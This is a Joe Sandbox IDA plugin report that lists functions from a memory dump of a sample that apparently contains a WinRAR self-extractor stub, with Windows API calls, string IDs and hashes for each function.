                • Instruction ID: 2ebf2aa4d8120842a58b7bf527dadfb28c521e27aeef4368c7723a77046faf38
                • Opcode Fuzzy Hash: 3b897f2c4ea7d772328124bc5afcdb4cdaa081d19ce423df7be17141a96c4ac9
                • Instruction Fuzzy Hash: 024148B54083069FC310DF65C88496FFBF8FB88714F004A2EF59692650E778E588CB52
                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,001FF5A2,?,00000000,?,00000000,00000000), ref: 001FEE6F
                • __fassign.LIBCMT ref: 001FEEEA
                • __fassign.LIBCMT ref: 001FEF05
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 001FEF2B
                • WriteFile.KERNEL32(?,?,00000000,001FF5A2,00000000,?,?,?,?,?,?,?,?,?,001FF5A2,?), ref: 001FEF4A
                • WriteFile.KERNEL32(?,?,00000001,001FF5A2,00000000,?,?,?,?,?,?,?,?,?,001FF5A2,?), ref: 001FEF83
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: 6209315467148df279281bee694939f0464e397cb38bb28d8da98609c31730bc
                • Instruction ID: b41fdd1e44069cc26b349d98e949f5fa7d4452baef8bc565b17d4fbfb5bbb32f
                • Opcode Fuzzy Hash: 6209315467148df279281bee694939f0464e397cb38bb28d8da98609c31730bc
                • Instruction Fuzzy Hash: 1F51D671A0064D9FCB14CFA8DC45AFEBBF9EF08310F14411AEA55E72A1D7309A50CB60
                APIs
                • GetTempPathW.KERNEL32(00000800,?), ref: 001EC54A
                • _swprintf.LIBCMT ref: 001EC57E
                  • Part of subcall function 001D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001D401D
                • SetDlgItemTextW.USER32(?,00000066,0021946A), ref: 001EC59E
                • _wcschr.LIBVCRUNTIME ref: 001EC5D1
                • EndDialog.USER32(?,00000001), ref: 001EC6B2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                • String ID: %s%s%u
                • API String ID: 2892007947-1360425832
                • Opcode ID: 824ce4fb559c72617ff0e7b0356342783864ca8166446d08a14522d90d629737
                • Instruction ID: c3a4f32f29fc94166b2180ac5d6901cf35802de880d6a8d5c1e79d37116b2494
                • Opcode Fuzzy Hash: 824ce4fb559c72617ff0e7b0356342783864ca8166446d08a14522d90d629737
                • Instruction Fuzzy Hash: 6D41D671D00A58AADF25DBA1DC49EEE77BCEF58301F0040A6E509D71A1EB719BC5CB90
                APIs
                • ShowWindow.USER32(?,00000000), ref: 001E964E
                • GetWindowRect.USER32(?,00000000), ref: 001E9693
                • ShowWindow.USER32(?,00000005,00000000), ref: 001E972A
                • SetWindowTextW.USER32(?,00000000), ref: 001E9732
                • ShowWindow.USER32(00000000,00000005), ref: 001E9748
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Window$Show$RectText
                • String ID: RarHtmlClassName
                • API String ID: 3937224194-1658105358
                • Opcode ID: efd42de3e4afe2270f43e0317e136290c7dc9dfc0a14200b802dbd38b57571e9
                • Instruction ID: aade500f6ed29c4b34834112edc3c52d99cf946ebe2fb6b74c4327a27111494c
                • Opcode Fuzzy Hash: efd42de3e4afe2270f43e0317e136290c7dc9dfc0a14200b802dbd38b57571e9
                • Instruction Fuzzy Hash: 4F31AA31404254EFCB119F66AD4CB6FBBA8FB48301F008559FE89AA162DB34D809CF61
                APIs
                  • Part of subcall function 001FBF79: _free.LIBCMT ref: 001FBFA2
                • _free.LIBCMT ref: 001FC003
                  • Part of subcall function 001F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,001FBFA7,?,00000000,?,00000000,?,001FBFCE,?,00000007,?,?,001FC3CB,?), ref: 001F84F4
                  • Part of subcall function 001F84DE: GetLastError.KERNEL32(?,?,001FBFA7,?,00000000,?,00000000,?,001FBFCE,?,00000007,?,?,001FC3CB,?,?), ref: 001F8506
                • _free.LIBCMT ref: 001FC00E
                • _free.LIBCMT ref: 001FC019
                • _free.LIBCMT ref: 001FC06D
                • _free.LIBCMT ref: 001FC078
                • _free.LIBCMT ref: 001FC083
                • _free.LIBCMT ref: 001FC08E
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                • Instruction ID: 9227ff371edbe13bec0665b06227cae5b7d21356decb324e34cb5a4aab084bc2
                • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                • Instruction Fuzzy Hash: 1B114F72544B0DFAD620BBB0CC47FEBB79D7F10700F408815B399A6452DB75F9048A90
                APIs
                • GetLastError.KERNEL32(?,?,001F20C1,001EFB12), ref: 001F20D8
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001F20E6
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001F20FF
                • SetLastError.KERNEL32(00000000,?,001F20C1,001EFB12), ref: 001F2151
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: c7620c8876b2a8c825a1769c138aa05782fc7dc1e3fa5eafa518b8a6ca74c35b
                • Instruction ID: e1b9dbca696e823642f45310b35e5da558c661bd59d12b6bbc2f935b6c9495ef
                • Opcode Fuzzy Hash: c7620c8876b2a8c825a1769c138aa05782fc7dc1e3fa5eafa518b8a6ca74c35b
                • Instruction Fuzzy Hash: 0201D43220D3196EEA646BB5BC8963A2A4CFB217747220B29F324551E2EF324C459548
                APIs
                • GetLastError.KERNEL32(?,?,?,001F895F,001F85FB,?,001F8FD3,00000001,00000364,?,001F3713,00000050,?,00210EE8,00000200), ref: 001F902E
                • _free.LIBCMT ref: 001F9063
                • _free.LIBCMT ref: 001F908A
                • SetLastError.KERNEL32(00000000,?,00210EE8,00000200), ref: 001F9097
                • SetLastError.KERNEL32(00000000,?,00210EE8,00000200), ref: 001F90A0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ErrorLast$_free
                • String ID: X
                • API String ID: 3170660625-3831130985
                • Opcode ID: ef36524ebec427e11f713abb61a2132eeb560c6773c0e19a319acfe9e4ad6347
                • Instruction ID: 2095d111c1ed33f928dd30a591d433c8388a9ab591b99b247340ff1e89900c25
                • Opcode Fuzzy Hash: ef36524ebec427e11f713abb61a2132eeb560c6773c0e19a319acfe9e4ad6347
                • Instruction Fuzzy Hash: 3101F4B2505B086BC32277357C89B3B262EAFE13717360124F70AD2253EF748C014160
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID:
                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                • API String ID: 0-1718035505
                • Opcode ID: 55abd63972a4a593ea46a8559810f6bb651d0249c5410a9d5a5ede0214c3d174
                • Instruction ID: 1bbfc02380f422760e0267c911668c704312e39e74900fa68e49c32b020fe0db
                • Opcode Fuzzy Hash: 55abd63972a4a593ea46a8559810f6bb651d0249c5410a9d5a5ede0214c3d174
                • Instruction Fuzzy Hash: 0301F471652BA25BCF205FB67CD92EF2399AA42392330153FE542D3280DB91C881DAB0
                APIs
                • _free.LIBCMT ref: 001F807E
                  • Part of subcall function 001F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,001FBFA7,?,00000000,?,00000000,?,001FBFCE,?,00000007,?,?,001FC3CB,?), ref: 001F84F4
                  • Part of subcall function 001F84DE: GetLastError.KERNEL32(?,?,001FBFA7,?,00000000,?,00000000,?,001FBFCE,?,00000007,?,?,001FC3CB,?,?), ref: 001F8506
                • _free.LIBCMT ref: 001F8090
                • _free.LIBCMT ref: 001F80A3
                • _free.LIBCMT ref: 001F80B4
                • _free.LIBCMT ref: 001F80C5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-771276903
                • Opcode ID: cd5c8e78dadf2ce952cc614632f06ffee201f60b6b0216fb2bec181f027c8960
                • Instruction ID: 7bdba89dff3af8c822b69fcfdb9d800d69aeb40290ecaab97e8fe4785f5312ab
                • Opcode Fuzzy Hash: cd5c8e78dadf2ce952cc614632f06ffee201f60b6b0216fb2bec181f027c8960
                • Instruction Fuzzy Hash: 55F082B58012298BCB11AF16FC1A4263B69FB247203094A0BFA0097A71CF3108B19FC1
                APIs
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 001E0D0D
                  • Part of subcall function 001DACF5: GetVersionExW.KERNEL32(?), ref: 001DAD1A
                • LocalFileTimeToFileTime.KERNEL32(?,001E0CB8), ref: 001E0D31
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 001E0D47
                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 001E0D56
                • SystemTimeToFileTime.KERNEL32(?,001E0CB8), ref: 001E0D64
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 001E0D72
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion
                • String ID:
                • API String ID: 2092733347-0
                • Opcode ID: 8f70b353706ff3f9badb7edde7322c4519c1dc255e58ac4bcde1dc713696c562
                • Instruction ID: c8d8fed990f42ab55cc6a07c1190c4d0a65bb03e5d56f1c10addbbaa8dc6b843
                • Opcode Fuzzy Hash: 8f70b353706ff3f9badb7edde7322c4519c1dc255e58ac4bcde1dc713696c562
                • Instruction Fuzzy Hash: CC31037A90024AEBCB00DFE5D8859EFFBBDFF58300B04441AE955E3211E730AA85CB64
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: _memcmp
                • String ID:
                • API String ID: 2931989736-0
                • Opcode ID: 8da11ff7b6aefad925e3ed0a5379674d909702b49fc3d9a8c25eb0a670689e04
                • Instruction ID: 8da9b625e1be0df7e37a4972bd3c5f73423db3747ad0bfe73eaa5244aa6cbbae
                • Opcode Fuzzy Hash: 8da11ff7b6aefad925e3ed0a5379674d909702b49fc3d9a8c25eb0a670689e04
                • Instruction Fuzzy Hash: 0D21A771600A4FBBDB089F12CC81E7F77ADEB51784B148128FD099B242E370DD918791
                APIs
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 001ED2F2
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001ED30C
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001ED31D
                • TranslateMessage.USER32(?), ref: 001ED327
                • DispatchMessageW.USER32(?), ref: 001ED331
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 001ED33C
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                • String ID:
                • API String ID: 2148572870-0
                • Opcode ID: 8e56b7b3f23dc0d8c0df4dc43318ea63acc16b1e9b8517dfe0005aaa5074392c
                • Instruction ID: 9b48edc380da5acd98ed722a093d7805b1d781bc5b02022ee41051ca74070b20
                • Opcode Fuzzy Hash: 8e56b7b3f23dc0d8c0df4dc43318ea63acc16b1e9b8517dfe0005aaa5074392c
                • Instruction Fuzzy Hash: 69F0EC72A01219ABCB209BA6FD4CEDFBF6EEF51791F048012F606D2051D6359549C7A1
                APIs
                • _wcschr.LIBVCRUNTIME ref: 001EC435
                  • Part of subcall function 001E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,001DBB05,00000000,.exe,?,?,00000800,?,?,001E85DF,?), ref: 001E17C2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: CompareString_wcschr
                • String ID: <$HIDE$MAX$MIN
                • API String ID: 2548945186-3358265660
                • Opcode ID: 1c6d792c6d5a9cc14f4b5af075bbe9a4077b73654343c8376d597da0a227b36e
                • Instruction ID: cf6a0aa6306badc50dc045a5fef4cb704ba0eba6c0abac0820c7e91776f0d42d
                • Opcode Fuzzy Hash: 1c6d792c6d5a9cc14f4b5af075bbe9a4077b73654343c8376d597da0a227b36e
                • Instruction Fuzzy Hash: 6A318372900A89AEDF25DA96CC41EEF77BDEB64700F004066FA05D7091EBB09FC58A90
                APIs
                  • Part of subcall function 001D130B: GetDlgItem.USER32(00000000,00003021), ref: 001D134F
                  • Part of subcall function 001D130B: SetWindowTextW.USER32(00000000,002035B4), ref: 001D1365
                • EndDialog.USER32(?,00000001), ref: 001EA9DE
                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 001EA9F6
                • SetDlgItemTextW.USER32(?,00000067,?), ref: 001EAA24
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: GETPASSWORD1$xj"
                • API String ID: 445417207-2354614350
                • Opcode ID: 4e9b1b585a904e96b51952a23d07748e7361fb6c662eee0bbde1103579ba04e4
                • Instruction ID: 0760ac3f452f6272fda92920ce23cd3afa61b9e066e4f65dc2493498510f8d6f
                • Opcode Fuzzy Hash: 4e9b1b585a904e96b51952a23d07748e7361fb6c662eee0bbde1103579ba04e4
                • Instruction Fuzzy Hash: CB114833940228BADB219E65AD09FFF377CEF59701F010021FA45B3081D360A954D6B2
                APIs
                • LoadBitmapW.USER32(00000065), ref: 001EADFD
                • GetObjectW.GDI32(00000000,00000018,?), ref: 001EAE22
                • DeleteObject.GDI32(00000000), ref: 001EAE54
                • DeleteObject.GDI32(00000000), ref: 001EAE77
                  • Part of subcall function 001E9E1C: FindResourceW.KERNEL32(001EAE4D,PNG,?,?,?,001EAE4D,00000066), ref: 001E9E2E
                  • Part of subcall function 001E9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,001EAE4D,00000066), ref: 001E9E46
                  • Part of subcall function 001E9E1C: LoadResource.KERNEL32(00000000,?,?,?,001EAE4D,00000066), ref: 001E9E59
                  • Part of subcall function 001E9E1C: LockResource.KERNEL32(00000000,?,?,?,001EAE4D,00000066), ref: 001E9E64
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                • String ID: ]
                • API String ID: 142272564-3352871620
                • Opcode ID: c024d5a58a2fdc1065e13ebc75836e094202af0989f47409e210327a4f4c7947
                • Instruction ID: c04f670bc87f8fd618bc0d0e9433c3b14f849ec4f7f0a7f9aaa223f22c553ab7
                • Opcode Fuzzy Hash: c024d5a58a2fdc1065e13ebc75836e094202af0989f47409e210327a4f4c7947
                • Instruction Fuzzy Hash: 5D014932540AA5E7C7106766AC0AABF7BB9AFA1B41F080010FD00B7291DF318C1986B1
                APIs
                  • Part of subcall function 001D130B: GetDlgItem.USER32(00000000,00003021), ref: 001D134F
                  • Part of subcall function 001D130B: SetWindowTextW.USER32(00000000,002035B4), ref: 001D1365
                • EndDialog.USER32(?,00000001), ref: 001ECCDB
                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 001ECCF1
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 001ECD05
                • SetDlgItemTextW.USER32(?,00000068), ref: 001ECD14
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: RENAMEDLG
                • API String ID: 445417207-3299779563
                • Opcode ID: 0e84d42ed85726263924f704c8274b68d3b3a24eebb3cd8ffe05f91f9de58bfb
                • Instruction ID: 1590dd776ea95fc49eb29f6322f933f47f1922deccdfaaba3bb9223e39c167be
                • Opcode Fuzzy Hash: 0e84d42ed85726263924f704c8274b68d3b3a24eebb3cd8ffe05f91f9de58bfb
                • Instruction Fuzzy Hash: DE012D32284750BAD5214FA5AD0CF9F3BACFB96742F210411F345A21D1C766551A87E5
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001F7573,00000000,?,001F7513,00000000,0020BAD8,0000000C,001F766A,00000000,00000002), ref: 001F75E2
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001F75F5
                • FreeLibrary.KERNEL32(00000000,?,?,?,001F7573,00000000,?,001F7513,00000000,0020BAD8,0000000C,001F766A,00000000,00000002), ref: 001F7618
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
